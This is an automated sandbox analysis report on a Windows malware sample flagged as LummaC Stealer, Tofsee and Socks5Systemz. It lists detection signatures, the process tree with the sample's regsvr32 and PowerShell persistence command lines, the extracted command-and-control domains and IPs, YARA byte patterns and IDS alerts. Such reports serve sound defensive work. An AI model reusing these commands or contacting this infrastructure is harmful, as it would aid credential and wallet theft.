
Windows Analysis Report
nK8noQeiXl.exe

Overview

General Information

Sample name: nK8noQeiXl.exe (renamed because original name is a hash value)
Original sample name: 32f7fa32fafc74bb0b26089e37a7fde1.exe
Analysis ID: 1665555
MD5: 32f7fa32fafc74bb0b26089e37a7fde1
SHA1: f608bb9d9ba24bc86db2436e612bb84f31be2e97
SHA256: c5308205d4d84ddc2a96194fcc509522ada976c3f5ee60e4208008ede1935359
Tags: exe, user-abuse_ch

Detection

HTMLPhisher, CryptOne, LummaC Stealer, Socks5Systemz, Tofsee
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
System process connects to network (likely due to code injection or exploit)
Yara detected BlockedWebSite
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Socks5Systemz
Yara detected Tofsee
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Creates HTML files with .exe extension (expired dropper behavior)
Found API chain indicative of debugger detection
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • nK8noQeiXl.exe (PID: 8572 cmdline: "C:\Users\user\Desktop\nK8noQeiXl.exe" MD5: 32F7FA32FAFC74BB0B26089E37A7FDE1)
    • svchost015.exe (PID: 8648 cmdline: "C:\Users\user\Desktop\nK8noQeiXl.exe" MD5: B826DD92D78EA2526E465A34324EBEEA)
      • DrjfIAN86u.exe (PID: 8856 cmdline: "C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe" MD5: 76435E8885559A7C3EF955DE05646970)
        • DrjfIAN86u.tmp (PID: 8872 cmdline: "C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp" /SL5="$60254,3470653,54272,C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe" MD5: 4979D6D3415EF991208E0E4B04C0474D)
          • ntfs2fat32converter102.exe (PID: 8920 cmdline: "C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe" -i MD5: 6AC5078FC3C5177D6E45251A0E889475)
      • Qv4wdsLMG.exe (PID: 8940 cmdline: "C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" MD5: FF6CABE0A00FC853F2D889075700D537)
        • Qv4wdsLMG.tmp (PID: 8960 cmdline: "C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp" /SL5="$50036,2140910,174080,C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" MD5: 1066651F2FDEF4FB17C5A6D7F3976C0A)
          • Qv4wdsLMG.exe (PID: 8992 cmdline: "C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" /VERYSILENT MD5: FF6CABE0A00FC853F2D889075700D537)
            • Qv4wdsLMG.tmp (PID: 9012 cmdline: "C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp" /SL5="$20528,2140910,174080,C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" /VERYSILENT MD5: 1066651F2FDEF4FB17C5A6D7F3976C0A)
              • regsvr32.exe (PID: 9056 cmdline: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
                • powershell.exe (PID: 9072 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • conhost.exe (PID: 9080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 8372 cmdline: "PowerShell.exe" -NoProfile -NonInteractive -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • conhost.exe (PID: 8344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 4836 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • vn6ZAuKJ8m7U3.exe (PID: 6776 cmdline: "C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe" MD5: 9208C64CF054174E106794F95A8E0D76)
  • regsvr32.exe (PID: 2540 cmdline: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL "C:\Windows\system32\config\systemprofile\AppData\Roaming\user32_8.drv" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Tofsee | According to PCrisk, Tofsee (also known as Gheg) is a malicious Trojan-type program that is capable of performing DDoS attacks, mining cryptocurrency, sending emails, stealing various account credentials, updating itself, and more. Cyber criminals mainly use this program as an email-oriented tool (they target users' email accounts), however, having Tofsee installed can also lead to many other problems. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee
{"C2 url": ["proenhann.digital/thnb", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "609a3af8f2b5fbb695363717b3ddf4a67885df"}
{"C2 list": ["185.39.17.76"]}
{"C2 list": ["quag.cn:443", "jotunheim.name:443"]}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\5I0ZLKZO7SYLHSOPSEU02A6S8PA.exe | JoeSecurity_BlockedWebSite | Yara detected BlockedWebSite | Joe Security |
C:\Users\user\AppData\Local\Temp\svchost015.exe | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
C:\Users\user\AppData\Local\Temp\svchost015.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
0000000A.00000002.2572481446.0000000002771000.00000020.10000000.00040000.00000000.sdmp | Windows_Trojan_Tofsee_26124fe4 | unknown | unknown |
  • 0x1544:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
  • 0xde95:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
0000000A.00000002.2572533022.0000000002780000.00000002.10000000.00040000.00000000.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
00000005.00000002.2574422459.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
0000000A.00000002.2572238453.0000000000550000.00000040.00000020.00020000.00000000.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |

Source | Rule | Description | Author | Strings
10.2.regsvr32.exe.2859196.1.unpack | Windows_Trojan_Tofsee_26124fe4 | unknown | unknown |
  • 0xd44:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
  • 0xd695:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
10.2.regsvr32.exe.2859196.1.unpack | MALWARE_Win_Tofsee | Detects Tofsee | ditekSHen |
  • 0xe110:$s2: loader_id
  • 0xe140:$s3: start_srv
  • 0xe170:$s4: lid_file_upd
  • 0xe164:$s5: localcfg
  • 0xe894:$s6: Incorrect respons
10.2.regsvr32.exe.5512e6.0.unpack | Windows_Trojan_Tofsee_26124fe4 | unknown | unknown |
  • 0xd44:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
  • 0xd695:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
10.2.regsvr32.exe.5512e6.0.unpack | MALWARE_Win_Tofsee | Detects Tofsee | ditekSHen |
  • 0xe110:$s2: loader_id
  • 0xe140:$s3: start_srv
  • 0xe170:$s4: lid_file_upd
  • 0xe164:$s5: localcfg
  • 0xe894:$s6: Incorrect respons
10.2.regsvr32.exe.5512e6.0.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |

System Summary

Source: Process started
Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv", ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 9056, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", ProcessId: 9072, ProcessName: powershell.exe

Source: Network Connection
Author: Dmitriy Lifanov, oscd.community
Data: DestinationIp: 52.101.41.22, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 9056, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49724

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv", CommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp" /SL5="$20528,2140910,174080,C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp, ParentProcessId: 9012, ParentProcessName: Qv4wdsLMG.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv", ProcessId: 9056, ProcessName: regsvr32.exe

Source: Network Connection
Author: frack113
Data: DestinationIp: 52.101.41.22, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 9056, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49724

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv", ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 9056, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", ProcessId: 9072, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started
Author: Joe Security
Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv", ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 9056, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }", ProcessId: 9072, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-15T17:03:28.269534+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49699 | 104.21.40.117 | 443 | TCP
2025-04-15T17:03:30.657833+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49700 | 104.21.40.117 | 443 | TCP
2025-04-15T17:03:32.504005+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49701 | 104.21.40.117 | 443 | TCP
2025-04-15T17:03:35.512321+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49702 | 104.21.40.117 | 443 | TCP
2025-04-15T17:03:40.237184+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49703 | 104.21.40.117 | 443 | TCP
2025-04-15T17:03:43.500528+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 104.21.40.117 | 443 | TCP
2025-04-15T17:03:47.469658+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 104.21.40.117 | 443 | TCP
2025-04-15T17:03:48.515770+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49710 | 104.21.53.21 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-15T17:03:43.911877+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:45.144954+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:47.164133+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:48.373264+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:49.598875+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49711 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:51.277894+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49712 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:52.496270+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:53.697078+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49714 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:54.993303+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49715 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:56.187347+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49716 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:57.477033+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49717 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:58.681384+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49718 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:59.886936+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49719 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:01.087303+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49720 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:02.294736+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49721 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:06.083976+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49725 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:07.292855+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49726 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:08.867662+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49729 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:10.050757+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49730 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:11.253616+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49731 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:12.646671+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49732 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:13.897169+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49733 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:15.110168+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49734 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:16.314426+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49735 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:17.527443+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49736 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:18.743684+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49737 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:19.956274+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49738 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:21.164318+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49739 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:22.350415+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49740 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:23.552882+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49741 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:24.772904+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49742 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:25.983833+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49744 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:27.169765+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49745 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:28.340285+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49746 | 185.39.17.76 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-15T17:03:44.499897+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:45.748023+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49706 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:47.760397+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49707 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:48.965041+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49709 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:50.196294+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49711 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:51.882433+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49712 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:53.077764+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49713 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:54.291244+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49714 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:55.586164+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49715 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:56.779745+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49716 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:58.076567+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49717 | 185.39.17.76 | 443 | TCP
2025-04-15T17:03:59.267842+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49718 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:00.485608+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49719 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:01.673865+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49720 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:02.881133+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49721 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:06.683045+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49725 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:07.885801+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49726 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:09.448365+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49729 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:10.630222+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49730 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:11.848892+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49731 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:13.248561+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49732 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:14.497524+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49733 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:15.705980+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49734 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:16.912150+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49735 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:18.120175+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49736 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:19.343099+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49737 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:20.558681+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49738 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:21.752336+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49739 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:22.929222+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49740 | 185.39.17.76 | 443 | TCP
2025-04-15T17:04:24.151162+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49741 | 185.39.17.76 | 443 | TCP
